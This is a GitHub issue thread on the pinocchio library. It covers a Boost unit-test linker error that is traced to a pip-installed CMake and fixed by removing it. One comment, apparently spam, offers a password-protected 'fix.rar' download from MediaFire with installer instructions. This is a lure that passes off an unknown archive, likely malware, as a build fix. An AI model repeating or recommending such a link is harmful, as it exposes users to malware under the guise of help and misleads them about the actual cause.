stack-of-tasks/pinocchio #2387: Build error against boost::unit_test symbols when BUILD_TESTING=ON

stephane-caron, 2024-08-26:
## Bug description

Today I ran into the following build error when compiling from source with `BUILD_TESTING=ON`:

```
[ 18%] Linking CXX executable pinocchio-test-cpp-macros
cd /home/scaron/src/pinocchio/_build/unittest && /home/scaron/.local/lib/python3.10/site-packages/cmake/data/bin/cmake -E cmake_link_script CMakeFiles/pinocchio-test-cpp-macros.dir/link.txt --verbose=1
/usr/bin/c++ -pedantic -Wno-long-long -Wall -Wextra -Wcast-align -Wcast-qual -Wformat -Wwrite-strings -Wconversion  "CMakeFiles/pinocchio-test-cpp-macros.dir/macros.cpp.o" -o pinocchio-test-cpp-macros 
/usr/bin/ld: CMakeFiles/pinocchio-test-cpp-macros.dir/macros.cpp.o: warning: relocation against `_ZN5boost9unit_test12lazy_ostream4instE' in read-only section `.text._ZN5boost9unit_test12lazy_ostream8instanceEv[_ZN5boost9unit_test12lazy_ostream8instanceEv]'
/usr/bin/ld: CMakeFiles/pinocchio-test-cpp-macros.dir/macros.cpp.o: in function `main':
macros.cpp:(.text+0x36): undefined reference to `boost::unit_test::unit_test_main(bool (*)(), int, char**)'
/usr/bin/ld: CMakeFiles/pinocchio-test-cpp-macros.dir/macros.cpp.o: in function `check_exception_msg(std::exception const&)':
macros.cpp:(.text+0xa2): undefined reference to `boost::unit_test::unit_test_log_t::set_checkpoint(boost::unit_test::basic_cstring<char const>, unsigned long, boost::unit_test::basic_cstring<char const>)'
/usr/bin/ld: CMakeFiles/pinocchio-test-cpp-macros.dir/macros.cpp.o: in function `Test::test_check_arguments_invoker()':
macros.cpp:(.text+0x68c): undefined reference to `boost::unit_test::unit_test_log_t::set_checkpoint(boost::unit_test::basic_cstring<char const>, unsigned long, boost::unit_test::basic_cstring<char const>)'
```

## Expected behavior

No build error.

## Workaround

I can build Pinocchio fine by setting `BUILD_TESTING=OFF`.

## Reproduction steps

Clone the `devel` branch from today, then:

```
mkdir _build && cd _build
cmake .. -DBUILD_PYTHON_INTERFACE=OFF -DBUILD_TESTING=ON
make
```

### System

- OS: Ubuntu 22.04
- Pinocchio version: happens on 3.0.0 and on `devel` from today
- I have checked the packages installed in `.github/workflows/linux.yml`, in particular I have `libboost-test-dev` installed

```console
$ dpkg --list |grep boost                                                              ✔ 
ii  libboost-chrono1.74.0:amd64                       1.74.0-14ubuntu3                                  amd64        C++ representation of time duration, time point, and clocks
ii  libboost-dev:amd64                                1.74.0.3ubuntu7                                   amd64        Boost C++ Libraries development files (default version)
ii  libboost-filesystem-dev:amd64                     1.74.0.3ubuntu7                                   amd64        filesystem operations (portable paths, iteration over directories, etc) in C++ (default version)
ii  libboost-filesystem1.74-dev:amd64                 1.74.0-14ubuntu3                                  amd64        filesystem operations (portable paths, iteration over directories, etc) in C++
ii  libboost-filesystem1.74.0:amd64                   1.74.0-14ubuntu3                                  amd64        filesystem operations (portable paths, iteration over directories, etc) in C++
ii  libboost-iostreams1.74.0:amd64                    1.74.0-14ubuntu3                                  amd64        Boost.Iostreams Library
ii  libboost-locale1.74.0:amd64                       1.74.0-14ubuntu3                                  amd64        C++ facilities for localization
ii  libboost-log1.74.0                                1.74.0-14ubuntu3                                  amd64        C++ logging library
ii  libboost-regex1.74.0:amd64                        1.74.0-14ubuntu3                                  amd64        regular expression library for C++
ii  libboost-serialization-dev:amd64                  1.74.0.3ubuntu7                                   amd64        serialization library for C++ (default version)
ii  libboost-serialization1.74-dev:amd64              1.74.0-14ubuntu3                                  amd64        serialization library for C++
ii  libboost-serialization1.74.0:amd64                1.74.0-14ubuntu3                                  amd64        serialization library for C++
ii  libboost-system-dev:amd64                         1.74.0.3ubuntu7                                   amd64        Operating system (e.g. diagnostics support) library (default version)
ii  libboost-system1.74-dev:amd64                     1.74.0-14ubuntu3                                  amd64        Operating system (e.g. diagnostics support) library
ii  libboost-system1.74.0:amd64                       1.74.0-14ubuntu3                                  amd64        Operating system (e.g. diagnostics support) library
ii  libboost-test-dev:amd64                           1.74.0.3ubuntu7                                   amd64        components for writing and executing test suites (default version)
ii  libboost-test1.74-dev:amd64                       1.74.0-14ubuntu3                                  amd64        components for writing and executing test suites
ii  libboost-test1.74.0:amd64                         1.74.0-14ubuntu3                                  amd64        components for writing and executing test suites
ii  libboost-thread1.74.0:amd64                       1.74.0-14ubuntu3                                  amd64        portable C++ multi-threading
ii  libboost1.74-dev:amd64                            1.74.0-14ubuntu3                                  amd64        Boost C++ Libraries development files
```

We-NutCracker, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

jcarpent, 2024-08-26:
Could you update your Boost version?

jcarpent, 2024-08-26:
Why your cmake is pointing to `/home/scaron/.local/lib/python3.10/site-packages/cmake/data/bin/cmake`?

jcarpent, 2024-08-26:
Are you really sure that you are using Boost provided along with your Linux distribution?

stephane-caron, 2024-08-27:
Thank you for taking a look!

> Are you really sure that you are using Boost provided along with your Linux distribution?

That seems to be the case, running the following from the Pinocchio build directory:

```console
$ cat CMakeCache.txt| grep libboost
Boost_FILESYSTEM_LIBRARY_DEBUG:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_filesystem.so
Boost_FILESYSTEM_LIBRARY_RELEASE:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_filesystem.so
Boost_SERIALIZATION_LIBRARY_DEBUG:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_serialization.so
Boost_SERIALIZATION_LIBRARY_RELEASE:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_serialization.so
Boost_SYSTEM_LIBRARY_DEBUG:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_system.so
Boost_SYSTEM_LIBRARY_RELEASE:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_system.so
Boost_UNIT_TEST_FRAMEWORK_LIBRARY_DEBUG:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_unit_test_framework.so
Boost_UNIT_TEST_FRAMEWORK_LIBRARY_RELEASE:FILEPATH=/usr/lib/x86_64-linux-gnu/libboost_unit_test_framework.so
```

> Why your cmake is pointing to /home/scaron/.local/lib/python3.10/site-packages/cmake/data/bin/cmake?

That was indeed non-standard. I had `pip`-installed cmake 3.27.1 for another reason. I have removed it (actually the broader instructions below) and re-run the reproduction steps with the CMake 3.22.1 from Debian packages → **now it works**.

```console
$ rm -rf ~/.local/lib/python3.10/cmake*
$ rm -rf ~/.local/lib/python3.10/cmeel*
```

Thank you @jcarpent for catching this :fishing_pole_and_fish: I'll be closing and leaving the instructions here in case it helps future travelers.